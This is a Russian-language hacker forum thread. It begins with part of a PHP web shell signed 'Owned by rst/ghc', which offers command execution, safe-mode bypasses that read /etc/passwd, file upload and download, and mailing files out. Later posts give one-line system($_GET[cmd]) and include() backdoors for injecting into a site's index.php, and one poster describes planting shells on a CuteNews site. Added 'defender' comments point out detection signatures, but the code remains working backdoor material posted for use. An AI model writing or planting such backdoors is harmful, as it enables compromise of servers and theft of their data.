if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$lines = file ('/tmp/mb_send_mail');
foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
break;
case 'test4':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
@imap_close($stream);
break;
case 'test5':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo $str;
@imap_close($stream);
break;
}
}
// The posted command is passed to ex() in both modes, and ex() is called twice in a row
// with the same string. NOTE(defender): each submitted command therefore shows up as a
// pair of identical child processes of the web-server account in process logs.
$cmd_rep = ex($_POST['cmd']);
$cmd_rep = ex($_POST['cmd']);
// Output is HTML-escaped; on non-Unix hosts it is first converted between Cyrillic code pages.
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }


echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
// Returns the opening <div id="..."> tag for a panel section. The section is rendered
// hidden (display: none) when a cookie named $id exists and compares equal to 0.
function div($id)
{
if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
return '<div id="'.$id.'">';
}
// Control panel: one POST form per feature, each posting back to the same URL.
// NOTE(defender): the field names used below (cmd, dir, alias, e_name, e_text, d_name,
// loc_file, to, compress, userfile, new_name, test1_file, test2_file) are what appears in
// request bodies, so they are usable in WAF rules or wherever POST bodies are logged.
// The footer string "(*)Owned by rst/ghc(!)" is a further content signature.
if(!$safe_mode){
// Free-form command execution form.
echo $fs.$table_up1.$lang['text2'].$table_up2.div('id1').$ts;
echo sr(15,"<b>".$lang['text3'].$arrow."</b>",in('text','cmd',85,''));
echo sr(15,"<b>".$lang['text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang['butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
// Safe-mode replacement: directory listing only.
echo $fs.$table_up1.$lang['text9'].$table_up2.div('id2').$ts;
echo sr(15,"<b>".$lang['text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang['butt5']));
echo $te.'</div>'.$table_end1.$fe;
}
// File editor form.
echo $fs.$table_up1.$lang['text14'].$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang['text15'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt3']));
echo $te.'</div>'.$table_end1.$fe;

// Alias drop-down, built from the $aliases labels; shown only when commands can run.
$aliases2='';
if(!$safe_mode){
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "<option>$alias_name</option>";
}
echo $fs.$table_up1.$lang['text7'].$table_up2.div('id6').$ts;
echo sr(15,"<b>".ws(9).$lang['text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
// Safe-mode file readers (test1 and test2 branches); both default to /etc/passwd.
if($safe_mode)
{
echo $fs.$table_up1.$lang['text11'].$table_up2.div('id10').$ts;
echo sr(15,"<b>".$lang['text11'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang['butt5']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.$lang['text11'].$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang['text11'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang['butt5']));
echo $te.'</div>'.$table_end1.$fe;
}
// Upload form, shown only when php.ini allows file uploads.
if(@ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.$lang['text5'].$table_up2.div('id14').$ts;
echo sr(15,"<b>".$lang['text6'].$arrow."</b>",in('file','userfile',85,''));
echo sr(15,"<b>".$lang['text12'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
// Download form with a compression choice limited to the formats this PHP build supports.
echo $fs.$table_up1.$lang['text20'].$table_up2.div('id16').$ts;
echo sr(15,"<b>".$lang['text18'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang['butt4']));
$arh = $lang['text21'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
echo sr(15,"<b>".$lang['text19'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
echo $te.'</div>'.$table_end1.$fe;

// Mail-out form, shown only when mail() exists; the recipient field is pre-filled with
// a placeholder address.
if(@function_exists("mail")){
echo $fs.$table_up1.$lang['text22'].$table_up2.div('id17').$ts;
echo sr(25,"<b>".$lang['text23'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang['text24'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang['text19'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang['butt6']));
echo $te.'</div>'.$table_end1.$fe;
}
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>(*)Owned by rst/ghc(!)</b></font></div></td></tr></table>";

} else
{
// Decoy branch: without the `auth` query parameter the script prints only this string.
// NOTE(defender): a benign-looking response does not clear a file; review the source on
// disk and compare it with the application's known-good copy.
echo "hello";
}

?>




Ну вот, залил шелл в скрипт. При запросе index.php?auth должно выкинуть шелл, а он нефига не выкидывает. В чём проблема?
 
"Только не мой моск!" (с) кто-то там

в 4ем проблема?
Проблема в коде. Не выполняется условие

Код:
// Sarcastic reply aimed at the poster, not part of the shell above. The parentheses in the
// condition are unbalanced, so the snippet is not valid PHP as written.
if($iq < 0) && empty($mind))
{
die('You too stupid to run this php-script');
}

Ну, собственно, вот...
 
пишешь в конец скрипта index.php
Код:
<?php
// NOTE(defender): minimal command-execution backdoor -- the value of the `cmd` query
// parameter is handed to system(). When auditing a web root, search PHP files for
// system/exec/shell_exec/passthru/popen called on $_GET, $_POST, $_REQUEST or $_COOKIE
// values, and look in access logs for `cmd=` on pages that never took such a parameter.
// File-integrity monitoring on application entry points (index.php) catches the appended lines.
if(isset($_GET[cmd]))
system($_GET[cmd]);
?>

Тогда при передаче параметра ?cmd=id выполнится команда id и результат будет внизу страницы
 
Каро4е дайте самый маленкий шелл мне
каро4е зделайте пример скрипта
Мне нузно 4тобы никто незамтелил я ыетот
Зы нехило))


<?php
// NOTE(defender): attempted file-inclusion backdoor -- the intent is to include() a path
// taken from the `shol` query parameter. include/require on request data is the pattern to
// search for; keeping allow_url_include off, constraining open_basedir, and monitoring
// application files for unexpected edits are the relevant controls.
if(isset(@$_GET[shol])){include(@$_GET[shol])};
?>
Вот так я пару дней назад хотел внедрить шелл в индекс файл Cutenews на одном сайте, когда прописывал этот код, грузилась пустая страничка, когда удалял всё было нормально.. хз
решение: взял кучу шеллов от РСТ и кинул в почти все директории))
 

